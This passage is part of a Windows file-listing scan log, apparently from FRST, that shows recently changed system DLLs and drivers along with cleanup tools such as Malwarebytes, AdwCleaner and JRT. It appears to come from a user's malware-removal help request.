000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2017-08-08 19:26 - 2017-07-31 17:15 - 000177648 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2017-08-08 19:26 - 2017-07-28 07:30 - 001068720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll 2017-08-08 19:26 - 2017-07-28 07:25 - 002399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll 2017-08-08 19:26 - 2017-07-28 07:24 - 002327456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys 2017-08-08 19:26 - 2017-07-28 07:24 - 000455584 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll 2017-08-08 19:26 - 2017-07-28 07:24 - 000119904 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcmnutils.dll 2017-08-08 19:26 - 2017-07-28 07:24 - 000116280 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcd.dll 2017-08-08 19:26 - 2017-07-28 07:23 - 002969888 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll 2017-08-08 19:26 - 2017-07-28 07:23 - 000723360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys 2017-08-08 19:26 - 2017-07-28 07:22 - 000923048 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll 2017-08-08 19:26 - 2017-07-28 07:20 - 000279968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys 2017-08-08 19:26 - 2017-07-28 07:17 - 000660680 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll 2017-08-08 19:26 - 2017-07-28 07:16 - 007326128 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll 2017-08-08 19:26 - 2017-07-28 07:16 - 000961952 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll 2017-08-08 19:26 - 2017-07-28 07:15 - 005302968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll 2017-08-08 19:26 - 2017-07-28 07:15 - 000872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll 2017-08-08 19:26 - 2017-07-28 07:15 - 000715168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys 2017-08-08 19:26 - 2017-07-28 07:15 - 000554400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS 2017-08-08 19:26 - 2017-07-28 07:14 - 000654976 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll 2017-08-08 19:26 - 2017-07-28 07:14 - 000318232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininit.exe 2017-08-08 19:26 - 2017-07-28 07:13 - 007907344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll 2017-08-08 19:26 - 2017-07-28 07:13 - 006557520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll 2017-08-08 19:26 - 2017-07-28 07:13 - 002604248 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll 2017-08-08 19:26 - 2017-07-28 07:13 - 001054280 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll 2017-08-08 19:26 - 2017-07-28 07:13 - 001033544 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll 2017-08-08 19:26 - 2017-07-28 07:13 - 000192264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll 2017-08-08 19:26 - 2017-07-28 07:13 - 000104432 _____ (Microsoft Corporation) C:\WINDOWS\system32\msacm32.dll 2017-08-08 19:26 - 2017-07-28 07:12 - 021353208 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll 2017-08-08 19:26 - 2017-07-28 07:12 - 001337856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll 2017-08-08 19:26 - 2017-07-28 07:12 - 001325968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll 2017-08-08 19:26 - 2017-07-28 07:12 - 000323936 _____ (Microsoft Corporation) C:\WINDOWS\system32\shlwapi.dll 2017-08-08 19:26 - 2017-07-28 07:10 - 002679200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys 2017-08-08 19:26 - 2017-07-28 07:10 - 001114528 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll 2017-08-08 19:26 - 2017-07-28 07:09 - 000529992 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll 2017-08-08 19:26 - 2017-07-28 07:09 - 000527976 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe 2017-08-08 19:26 - 2017-07-28 07:09 - 000387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll 2017-08-08 19:26 - 2017-07-28 07:07 - 000805816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll 2017-08-08 19:26 - 2017-07-28 06:48 - 001839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll 2017-08-08 19:26 - 2017-07-28 06:48 - 000100232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcd.dll 2017-08-08 19:26 - 2017-07-28 06:48 - 000096648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmcmnutils.dll 2017-08-08 19:26 - 2017-07-28 06:47 - 002259768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll 2017-08-08 19:26 - 2017-07-28 06:40 - 005820984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll 2017-08-08 19:26 - 2017-07-28 06:40 - 000551200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll 2017-08-08 19:26 - 2017-07-28 06:38 - 004213656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll 2017-08-08 19:26 - 2017-07-28 06:37 - 000519680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll 2017-08-08 19:26 - 2017-07-28 06:36 - 020373408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll 2017-08-08 19:26 - 2017-07-28 06:36 - 006761568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll 2017-08-08 19:26 - 2017-07-28 06:36 - 005808640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll 2017-08-08 19:26 - 2017-07-28 06:36 - 002424024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll 2017-08-08 19:26 - 2017-07-28 06:36 - 001195760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll 2017-08-08 19:26 - 2017-07-28 06:36 - 000866808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DolbyDecMFT.dll 2017-08-08 19:26 - 2017-07-28 06:36 - 000864248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll 2017-08-08 19:26 - 2017-07-28 06:36 - 000173104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsensorgroup.dll 2017-08-08 19:26 - 2017-07-28 06:36 - 000090464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msacm32.dll 2017-08-08 19:26 - 2017-07-28 06:35 - 000988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2017-08-08 19:26 - 2017-07-28 06:35 - 000277432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shlwapi.dll 2017-08-08 19:26 - 2017-07-28 06:33 - 000967584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll 2017-08-08 19:26 - 2017-07-28 06:33 - 000583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll 2017-08-08 19:26 - 2017-07-28 06:33 - 000414296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll 2017-08-08 19:26 - 2017-07-28 06:31 - 003995136 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbon.dll 2017-08-08 19:26 - 2017-07-28 06:30 - 001722880 _____ (Microsoft Corporation) C:\WINDOWS\system32\dui70.dll 2017-08-08 19:26 - 2017-07-28 06:29 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll 2017-08-08 19:26 - 2017-07-28 06:29 - 000142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmredir.dll 2017-08-08 19:26 - 2017-07-28 06:27 - 000051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\UcmUcsi.sys 2017-08-08 19:26 - 2017-07-28 06:26 - 000102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\officecsp.dll 2017-08-08 19:26 - 2017-07-28 06:26 - 000094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll 2017-08-08 19:26 - 2017-07-28 06:26 - 000090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\ofdeploy.exe 2017-08-08 19:26 - 2017-07-28 06:26 - 000044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll 2017-08-08 19:26 - 2017-07-28 06:26 - 000022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\IpNatHlpClient.dll 2017-08-08 19:26 - 2017-07-28 06:25 - 003464704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbon.dll 2017-08-08 19:26 - 2017-07-28 06:25 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyMATEnc.dll 2017-08-08 19:26 - 2017-07-28 06:25 - 000115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys 2017-08-08 19:26 - 2017-07-28 06:25 - 000112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll 2017-08-08 19:26 - 2017-07-28 06:24 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll 2017-08-08 19:26 - 2017-07-28 06:24 - 000184832 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll 2017-08-08 19:26 - 2017-07-28 06:24 - 000136192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryUpgrade.dll 2017-08-08 19:26 - 2017-07-28 06:24 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll 2017-08-08 19:26 - 2017-07-28 06:24 - 000043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmTasks.dll 2017-08-08 19:26 - 2017-07-28 06:23 - 007931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll 2017-08-08 19:26 - 2017-07-28 06:23 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyHrtfEnc.dll 2017-08-08 19:26 - 2017-07-28 06:23 - 000189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll 2017-08-08 19:26 - 2017-07-28 06:22 - 000778240 _____ C:\WINDOWS\system32\MBR2GPT.EXE 2017-08-08 19:26 - 2017-07-28 06:22 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll 2017-08-08 19:26 - 2017-07-28 06:22 - 000500224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.BlueLightReduction.dll 2017-08-08 19:26 - 2017-07-28 06:22 - 000491520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Display.dll 2017-08-08 19:26 - 2017-07-28 06:22 - 000450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe 2017-08-08 19:26 - 2017-07-28 06:22 - 000259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll 2017-08-08 19:26 - 2017-07-28 06:22 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll 2017-08-08 19:26 - 2017-07-28 06:22 - 000197120 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdboot.exe 2017-08-08 19:26 - 2017-07-28 06:21 - 008333312 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll 2017-08-08 19:26 - 2017-07-28 06:21 - 000699904 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll 2017-08-08 19:26 - 2017-07-28 06:21 - 000527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll 2017-08-08 19:26 - 2017-07-28 06:21 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Notifications.dll 2017-08-08 19:26 - 2017-07-28 06:21 - 000165888 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll 2017-08-08 19:26 - 2017-07-28 06:21 - 000150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\qasf.dll 2017-08-08 19:26 - 2017-07-28 06:21 - 000029184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cmintegrator.dll 2017-08-08 19:26 - 2017-07-28 06:20 - 001015296 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll 2017-08-08 19:26 - 2017-07-28 06:20 - 000524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll 2017-08-08 19:26 - 2017-07-28 06:20 - 000079872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll 2017-08-08 19:26 - 2017-07-28 06:20 - 000018432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IpNatHlpClient.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 001878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 000942592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 000847360 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 000817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 000687616 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 000566784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.UX.EapRequestHandler.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 000417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe 2017-08-08 19:26 - 2017-07-28 06:19 - 000412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 000370688 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastlsext.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 000229376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe 2017-08-08 19:26 - 2017-07-28 06:19 - 000147456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll 2017-08-08 19:26 - 2017-07-28 06:19 - 000117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryUpgrade.dll 2017-08-08 19:26 - 2017-07-28 06:18 - 001468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll 2017-08-08 19:26 - 2017-07-28 06:18 - 001298432 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpasvc.dll 2017-08-08 19:26 - 2017-07-28 06:18 - 001260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe 2017-08-08 19:26 - 2017-07-28 06:18 - 000925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll 2017-08-08 19:26 - 2017-07-28 06:18 - 000777216 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll 2017-08-08 19:26 - 2017-07-28 06:18 - 000586240 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll 2017-08-08 19:26 - 2017-07-28 06:18 - 000536064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll 2017-08-08 19:26 - 2017-07-28 06:18 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BluetoothApis.dll 2017-08-08 19:26 - 2017-07-28 06:17 - 006728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll 2017-08-08 19:26 - 2017-07-28 06:17 - 002805248 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll 2017-08-08 19:26 - 2017-07-28 06:17 - 001886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll 2017-08-08 19:26 - 2017-07-28 06:17 - 000770048 _____ (Microsoft Corporation) C:\WINDOWS\system32\PCPKsp.dll 2017-08-08 19:26 - 2017-07-28 06:17 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll 2017-08-08 19:26 - 2017-07-28 06:17 - 000420864 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll 2017-08-08 19:26 - 2017-07-28 06:16 - 001291776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll 2017-08-08 19:26 - 2017-07-28 06:16 - 001046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll 2017-08-08 19:26 - 2017-07-28 06:16 - 000470016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll 2017-08-08 19:26 - 2017-07-28 06:16 - 000383488 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe 2017-08-08 19:26 - 2017-07-28 06:16 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qasf.dll 2017-08-08 19:26 - 2017-07-28 06:15 - 005721600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll 2017-08-08 19:26 - 2017-07-28 06:15 - 003204608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.dll 2017-08-08 19:26 - 2017-07-28 06:15 - 000986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll 2017-08-08 19:26 - 2017-07-28 06:15 - 000612864 _____ (Microsoft Corporation) C:\WINDOWS\system32\shsvcs.dll 2017-08-08 19:26 - 2017-07-28 06:15 - 000586752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Web.Core.dll 2017-08-08 19:26 - 2017-07-28 06:14 - 004396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll 2017-08-08 19:26 - 2017-07-28 06:14 - 001305088 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll 2017-08-08 19:26 - 2017-07-28 06:14 - 000368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe 2017-08-08 19:26 - 2017-07-28 06:14 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll 2017-08-08 19:26 - 2017-07-28 06:14 - 000331264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastlsext.dll 2017-08-08 19:26 - 2017-07-28 06:13 - 004535296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll 2017-08-08 19:26 - 2017-07-28 06:13 - 001293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll 2017-08-08 19:26 - 2017-07-28 06:13 - 000972288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll 2017-08-08 19:26 - 2017-07-28 06:13 - 000932352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GamePanel.exe 2017-08-08 19:26 - 2017-07-28 06:13 - 000809984 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll 2017-08-08 19:26 - 2017-07-28 06:13 - 000665600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll 2017-08-08 19:26 - 2017-07-28 06:13 - 000636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll 2017-08-08 19:26 - 2017-07-28 06:12 - 005557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll 2017-08-08 19:26 - 2017-07-28 06:12 - 004707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll 2017-08-08 19:26 - 2017-07-28 06:12 - 002939392 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll 2017-08-08 19:26 - 2017-07-28 06:12 - 002444288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2017-08-08 19:26 - 2017-07-28 06:12 - 000952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll 2017-08-08 19:26 - 2017-07-28 06:12 - 000587776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PCPKsp.dll 2017-08-08 19:26 - 2017-07-28 06:12 - 000446464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll 2017-08-08 19:26 - 2017-07-28 06:12 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll 2017-08-08 19:26 - 2017-07-28 06:12 - 000337920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe 2017-08-08 19:26 - 2017-07-28 06:11 - 003667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll 2017-08-08 19:26 - 2017-07-28 06:11 - 001357312 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll 2017-08-08 19:26 - 2017-07-28 06:11 - 001248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll 2017-08-08 19:26 - 2017-07-28 06:10 - 001706496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll 2017-08-08 19:26 - 2017-07-28 06:10 - 001019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll 2017-08-08 19:26 - 2017-07-28 06:10 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll 2017-08-08 19:26 - 2017-07-28 06:10 - 000625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll 2017-08-08 19:26 - 2017-07-28 06:10 - 000564224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shsvcs.dll 2017-08-08 19:26 - 2017-07-28 06:09 - 005225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll 2017-08-08 19:26 - 2017-07-28 06:09 - 000971264 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe 2017-08-08 19:26 - 2017-07-28 06:09 - 000579072 _____ (Microsoft Corporation) C:\WINDOWS\system32\untfs.dll 2017-08-08 19:26 - 2017-07-28 06:08 - 004559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll 2017-08-08 19:26 - 2017-07-28 06:08 - 004417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll 2017-08-08 19:26 - 2017-07-28 06:08 - 004056064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll 2017-08-08 19:26 - 2017-07-28 06:08 - 000760832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll 2017-08-08 19:26 - 2017-07-28 06:08 - 000600576 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll 2017-08-08 19:26 - 2017-07-28 06:08 - 000097792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthhfenum.sys 2017-08-08 19:26 - 2017-07-28 06:07 - 002211840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll 2017-08-08 19:26 - 2017-07-28 06:07 - 000112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe 2017-08-08 19:26 - 2017-07-28 06:07 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\system32\RjvMDMConfig.dll 2017-08-08 19:26 - 2017-07-28 06:07 - 000074240 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll 2017-08-08 19:26 - 2017-07-28 06:07 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmApiSetExtImplDesktop.dll 2017-08-08 19:26 - 2017-07-28 06:06 - 001833984 _____ (Microsoft Corporation) C:\WINDOWS\system32\workfolderssvc.dll 2017-08-08 19:26 - 2017-07-28 06:06 - 000593408 _____ (Microsoft Corporation) C:\WINDOWS\system32\BootMenuUX.dll 2017-08-08 19:26 - 2017-07-28 06:06 - 000093696 _____ (Microsoft Corporation) C:\WINDOWS\system32\spbcd.dll 2017-08-08 19:26 - 2017-07-28 06:05 - 001536512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll 2017-08-08 19:26 - 2017-07-28 06:05 - 001525760 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe 2017-08-08 19:26 - 2017-07-28 06:05 - 001087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll 2017-08-08 19:26 - 2017-07-28 06:05 - 000954368 _____ (Microsoft Corporation) C:\WINDOWS\system32\autoconv.exe 2017-08-08 19:26 - 2017-07-28 06:05 - 000926208 _____ (Microsoft Corporation) C:\WINDOWS\system32\autofmt.exe 2017-08-08 19:26 - 2017-07-28 06:05 - 000892928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe 2017-08-08 19:26 - 2017-07-28 06:05 - 000538112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\untfs.dll 2017-08-08 19:26 - 2017-07-28 06:05 - 000078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\setbcdlocale.dll 2017-08-08 19:26 - 2017-07-28 06:02 - 000877056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autoconv.exe 2017-08-08 19:26 - 2017-07-28 06:02 - 000853504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autofmt.exe 2017-08-08 19:26 - 2017-07-28 06:02 - 000077312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\spbcd.dll 2017-08-08 17:48 - 2017-08-08 17:48 - 000000017 _____ C:\Users\***\AppData\Local\resmon.resmoncfg 2017-08-07 23:58 - 2017-08-09 18:57 - 000000555 _____ C:\Users\***\Desktop\JRT.txt 2017-08-07 23:57 - 2017-08-07 23:56 - 001790024 _____ (Malwarebytes) C:\Users\***\Desktop\JRT.exe 2017-08-07 23:56 - 2017-08-07 23:56 - 001790024 _____ (Malwarebytes) C:\Users\***\Downloads\JRT.exe 2017-08-07 23:35 - 2017-08-07 23:34 - 008185288 _____ (Malwarebytes) C:\Users\***\Desktop\adwcleaner_7.0.1.0.exe 2017-08-07 23:34 - 2017-08-07 23:34 - 008185288 _____ (Malwarebytes) C:\Users\***\Downloads\adwcleaner_7.0.1.0.exe 2017-08-06 01:08 - 2017-08-06 01:08 - 001160480 _____ (Uniblue Systems Limited ) C:\Users\***\Downloads\pcmechanicpm.exe 2017-08-06 00:28 - 2017-08-06 00:28 - 000097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll 2017-08-05 22:57 - 2017-08-05 22:57 - 000000927 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk 2017-08-05 22:57 - 2017-08-05 22:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller 2017-08-04 22:53 - 2017-08-09 18:59 - 000000000 ____D C:\Users\***\.junique 2017-08-04 22:53 - 2017-08-04 22:55 - 000000000 ____D C:\Users\***\.minion 2017-08-04 22:53 - 2017-08-04 22:53 - 000000000 ____D C:\Users\***\AppData\Roaming\gg.minion.Minion 2017-08-04 22:53 - 2017-08-04 22:53 - 000000000 ____D C:\Users\***\.oracle_jre_usage 2017-08-04 22:52 - 2017-08-04 22:52 - 052825304 _____ (Good Game Mods LLC ) C:\Users\***\Desktop\Minion3.0.5.exe 2017-08-04 22:52 - 2017-08-04 22:52 - 000000664 _____ C:\Users\***\Documents\Minion.lnk 2017-08-04 22:52 - 2017-08-04 22:52 - 000000000 ____D C:\Users\***\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Good Game Mods LLC 2017-08-01 15:04 - 2017-08-06 01:24 - 000092298 _____ C:\Users\***\Desktop\Addition.txt 2017-08-01 15:01 - 2017-08-09 18:59 - 000021213 _____ C:\Users\***\Desktop\FRST.txt 2017-08-01 12:17 - 2017-08-07 23:52 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable) 2017-08-01 12:17 - 2017-08-07 19:45 - 000192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys 2017-08-01 12:17 - 2017-08-01 12:32 - 000000000 ____D C:\Users\***\AppData\Local\Nybgy 2017-08-01 12:17 - 2017-08-01 12:17 - 000000000 ____D C:\ProgramData\Malwarebytes 2017-08-01 12:15 - 2017-08-07 19:45 - 000109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys 2017-08-01 12:14 - 2017-08-07 19:55 - 000000000 ____D C:\Users\***\Desktop\mbar 2017-08-01 12:06 - 2017-08-01 12:06 - 016563352 _____ 